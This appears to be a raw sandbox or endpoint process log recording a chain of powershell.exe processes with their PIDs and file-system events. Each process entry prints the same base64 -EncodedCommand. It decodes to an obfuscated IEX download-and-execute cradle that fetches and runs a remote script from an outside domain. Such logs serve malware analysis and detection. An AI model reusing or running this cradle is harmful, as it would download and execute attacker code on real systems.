C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
40
3200
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
41
3232
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
42
3284
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
43
3324
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
44
3440
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
45
3472
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Process
46
3532
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
47
3564
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
48
3608
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
49
3644
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
50
3676
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
51
3708
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
52
3732
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
53
3764
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
54
3784
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
55
3808
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
56
3836
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
57
3856
powershell.exe
1868
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
58
3864
powershell.exe
1960
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
59
3872
powershell.exe
2060
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
60
3884
powershell.exe
2336
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
61
3896
powershell.exe
200
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
